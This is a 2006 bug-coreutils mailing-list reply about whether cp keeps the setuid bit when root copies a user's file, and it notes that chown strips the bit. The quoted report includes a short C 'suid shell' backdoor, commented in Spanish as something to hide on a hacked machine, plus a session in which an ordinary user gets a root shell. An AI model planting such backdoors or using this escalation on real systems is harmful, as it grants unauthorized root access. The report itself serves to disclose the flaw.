bug-coreutils
[Top][All Lists]
Advanced

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: Permissions over suid files


From: Crg
Subject: Re: Permissions over suid files
Date: Mon, 2 Oct 2006 16:38:29 +0200

Hmm i was checking the source code ... and seems is the kernel syscall
who remove the suid, when you make a chown ...

2006/10/2, Pedro Andujar <address@hidden>:
Hello,

When root is copying a non-privileged user file with the bit suid on,
the file gets "chowned" to root and bit suid is not removed.

That could mean a security compromise.

Example:

address@hidden ~]$ cat > c.c
/* Suid shell || uid=0(root) gid=0(root) || Lo compilas y ocultas
 * en la maquina hackeada. Despues: "chmod 6755 suidshell", todo
 * esto como root. Crg
*/

#include <stdio.h>
#define root 0

main()
{
    system("clear");
    printf("Now you are r00t!!\n\n");
    seteuid(root);
    setuid(root);
    setgid(root);
/* cambiar "/bin/bash" por "/bin/sh" en caso que el sistema no tuviera bash */
    system("/bin/bash");
}


address@hidden ~]$ make c
cc     c.c   -o c
address@hidden ~]$ chmod 6755 c


**now root**

address@hidden tmp]# cp /home/pandujar/c ./
address@hidden tmp]# ls -l c
-rwsr-sr-x  1 root root 5172 Oct  2 16:13 c


**user again**

address@hidden ~]$ /tmp/c


Now you are r00t!!

address@hidden ~]#


Other tools like "chown" have this kind of protection:

address@hidden tmp]# cd /home/pandujar/
address@hidden pandujar]# ls -l c
-rwsr-sr-x  1 pandujar tiger 5172 Oct  2 16:13 c
address@hidden pandujar]# chown root.root c
address@hidden pandujar]# ls -l c
-rwxr-xr-x  1 root root 5172 Oct  2 16:13 c





reply via email to

[Prev in Thread] Current Thread [Next in Thread]